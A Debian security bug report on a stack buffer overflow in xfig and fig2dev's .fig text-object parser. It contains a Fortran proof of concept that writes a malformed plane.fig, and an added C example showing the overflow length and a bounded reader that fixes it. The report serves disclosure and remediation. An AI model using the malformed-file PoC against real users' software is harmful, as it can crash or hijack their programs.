Subject: xfig: buffer overflow in read .fig file
Package: xfig
Version: 1:3.2.5-rel-3
Severity: grave
Justification: user security hole
Tags: security

xfig, and fig2dev in the transfig package, will buffer overflow when reading
a .fig file. See the PoC file included below; compile with gfortran.

-- PEDAMACHEPHEPTOLIONES & D.B. COOPER

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages xfig depends on:
ii  libc6                    2.7-18          GNU C Library: Shared libraries
ii  libjpeg62                6b-14           The Independent JPEG Group's JPEG
ii  libpng12-0               1.2.27-2+lenny2 PNG library - runtime
ii  libx11-6                 2:1.1.5-2       X11 client-side library
ii  libxi6                   2:1.1.4-1       X11 Input extension library
ii  libxpm4                  1:3.5.7-1       X11 pixmap library
ii  libxt6                   1:1.0.5-3       X11 toolkit intrinsics library
ii  xaw3dg                   1.5+E-17        Xaw3d widget set

Versions of packages xfig recommends:
ii  transfig                 1:3.2.5-rel-3.1 Utilities for converting XFig figu
ii  xfig-libs                1:3.2.5-rel-3   XFig image libraries and examples

-- no debconf information
       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptolio...@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      BUILD (FILE NAME ASSUMED; FIXED-FORM SOURCE, SO USE A .f SUFFIX):
C      gfortran -o xfig_poc xfig_poc.f
C      ./xfig_poc          -> WRITES plane.fig IN THE CURRENT DIRECTORY
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

C      FIXED FORM: 'C' IN COLUMN 1 IS A COMMENT, LABELS SIT IN COLUMNS
C      1-5, STATEMENTS START AT COLUMN 7 OR LATER
       INTEGER I
       CHARACTER(LEN=167) :: STR

C      FILL THE OVERLONG TEXT FIELD WITH 167 'Z' BYTES
       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

C      WRITE plane.fig: TWO SHORT LEADING RECORDS, THEN ONE TEXT-OBJECT
C      RECORD OF SEVEN INTEGER FIELDS FOLLOWED BY THE 167-BYTE STRING.
C      LIST-DIRECTED OUTPUT (THE '*' FORMAT) PREFIXES EACH RECORD WITH
C      ONE BLANK; THE sscanf-STYLE READER SKIPS LEADING WHITESPACE.
       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC
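The report names the bug class (an overlong text field of a v1.3 text-object record landing in a fixed stack buffer) but does not show the parser code. The C program below is an added example, not xfig or transfig source: it rebuilds the PoC's text-object record, reports how many bytes an unbounded "%[^\n]" scan into a fixed stack buffer would store (without performing the overflowing write, so the example can be run safely), and shows a length-checked reader that rejects such a record. TEXT_MAX, build_poc_record, unsafe_store_len, text_field and read_text_object_bounded are hypothetical names, and the 128-byte buffer size is an assumption, not the size used in xfig or fig2dev.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed stack buffer in the text-object reader. The real
 * size in xfig/fig2dev is not stated in the report; this value is hypothetical. */
#define TEXT_MAX 128

/* Build the text-object record the Fortran PoC writes: seven integer fields,
 * a space, then `len` bytes of 'Z'. Returns the record length, or -1 if `out`
 * is too small to hold it. (Constructed input for this example.) */
int build_poc_record(char *out, size_t outsz, size_t len)
{
    const char *prefix = "1 2 3 4 5 6 7 ";
    size_t plen = strlen(prefix);
    if (plen + len + 1 > outsz)
        return -1;
    memcpy(out, prefix, plen);
    memset(out + plen, 'Z', len);
    out[plen + len] = '\0';
    return (int)(plen + len);
}

/* Locate the text field: parse the seven integers and skip the whitespace
 * after them. Returns a pointer to the text, or NULL if fewer than seven
 * integers parse. The %n conversion records how many bytes were consumed. */
static const char *text_field(const char *rec, int v[7])
{
    int consumed = 0;
    if (sscanf(rec, "%d %d %d %d %d %d %d %n",
               &v[0], &v[1], &v[2], &v[3], &v[4], &v[5], &v[6], &consumed) != 7)
        return NULL;
    return rec + consumed;
}

/* The unsafe pattern is `sscanf(text, "%[^\n]", buf)` with no field width into
 * a buffer of TEXT_MAX bytes: the scan stores the whole field plus a NUL no
 * matter how long it is. Executing that on the PoC record would corrupt this
 * program's own stack, so this function only computes how many bytes that scan
 * would store. Callers compare the result with TEXT_MAX. */
int unsafe_store_len(const char *rec)
{
    int v[7];
    const char *t = text_field(rec, v);
    if (!t)
        return -1;
    return (int)strcspn(t, "\n") + 1;
}

/* Hardened reader: same record layout, but the text length is checked against
 * the destination before anything is copied. Returns the text length, -1 on a
 * malformed record, -2 when the text does not fit. The record is rejected
 * outright rather than silently truncated, which is what a width such as
 * "%127[^\n]" would do while leaving the rest of the line unparsed. */
int read_text_object_bounded(const char *rec, int v[7], char *text, size_t textsz)
{
    const char *t = text_field(rec, v);
    if (!t)
        return -1;
    size_t n = strcspn(t, "\n");
    if (n >= textsz)
        return -2;
    memcpy(text, t, n);
    text[n] = '\0';
    return (int)n;
}

int main(void)
{
    char rec[256];
    char text[TEXT_MAX];
    int v[7];
    int len = build_poc_record(rec, sizeof rec, 167); /* same record as plane.fig */
    int need = unsafe_store_len(rec);
    printf("record %d bytes; unbounded %%[^\\n] would store %d bytes into a %d-byte buffer\n",
           len, need, TEXT_MAX);
    printf("bounded reader returns %d\n",
           read_text_object_bounded(rec, v, text, sizeof text));
    return 0;
}
```

The point of the bounded reader is that the length check happens before the copy and the record is refused, so a malformed file produces a parse error instead of a write past the end of the stack buffer.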
